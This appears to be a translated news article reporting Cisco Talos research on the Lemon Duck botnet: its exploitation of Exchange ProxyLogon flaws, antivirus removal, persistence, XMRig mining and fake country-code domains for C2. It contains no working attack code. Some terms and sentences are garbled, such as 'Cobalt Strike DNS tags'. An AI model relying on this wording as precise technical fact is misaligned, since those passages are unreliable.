Researchers have analyzed the latest activities of the Lemon Duck cybercriminal group, including their exploitation of Microsoft Exchange Server vulnerabilities and their use of fake top-level domains.
The exploitation of Microsoft Exchange Server vulnerabilities by cybercriminals has been a disaster for the security of thousands of organizations.
Four critical vulnerabilities, dubbed ProxyLogon, affected Microsoft Exchange 2013, 2016, and 2010 on-premises servers. Patches, vulnerability detection tools and mitigation guidelines were made available in March, but it is still estimated that up to 60,000 organizations could have been compromised. The exploit code, too, is now available, and at least 10 sophisticated cybercriminal groups have adopted the loopholes in their attacks this year.
The Lemon Duck botnet under the microscope
At the end of March, Microsoft warned that the Lemon Duck botnet was attempting to exploit vulnerable servers and use compromised systems to mine cryptocurrency. Today, researchers at Cisco Talos released an in-depth analysis of the tactics of this group.
Lemon Duck operators are integrating new tools to “maximize the effectiveness of their campaigns” by targeting vulnerabilities in Microsoft Exchange Server. Telemetry data from DNS queries to Lemon Duck’s domains indicates that campaign activity peaked in April. The majority of requests came from the United States, followed by Europe and Southeast Asia. There was also a significant spike in requests to a Lemon Duck domain in India.
Lemon Duck operators use automated tools to analyze, detect and exploit servers before installing payloads, such as Cobalt Strike DNS tags and web shells, which allows them to run mining software. additional cryptocurrency and malware.
The malware and associated PowerShell scripts will also attempt to remove antivirus products offered by vendors such as ESET and Kaspersky and shut down any services – including Windows Update and Windows Defender – that could hinder an infection attempt.
Scheduled tasks are created to maintain persistence, and in recent campaigns the CertUtil command line program is used to download two new PowerShell scripts responsible for removing anti-virus products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner.
The signatures of competing cryptocurrency miners are also listed in a “killer” module aimed at removing them.
SMBGhost and Eternal Blue have been used in previous campaigns, but as the exploitation of Microsoft Exchange Server flaws shows, the group’s tactics are constantly changing to stay ahead of the game.
Lemon Duck also created fictitious Top Level Domains (TLDs) for China, Japan, and South Korea, in an attempt to disguise the infrastructure of Command and Control (C2) centers.
“Considering that these ccTLDs are most often used for websites in their respective countries and languages, it is also interesting that they were used in connection with this attack, rather than more generic and globally used TLDs such as” .com “or” .net “,” notes Cisco Talos. “This can allow the malicious actor to more effectively conceal the communications to the control server among other web traffic present in the environments of the victims. “
Links between the Lemon Duck botnet and the Beapy / Pcastle cryptocurrency malware have also been observed.
“The use of new tools, like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, can allow them to operate more effectively for longer periods of time in the attack. within the environments of the victims, ”say the researchers. “New tactics and additional host-based evidence suggest that this player is also now showing a specific interest in Exchange servers, as he attempts to compromise additional systems and maintain and / or increase the number of systems within the Lemon Duck botnet. “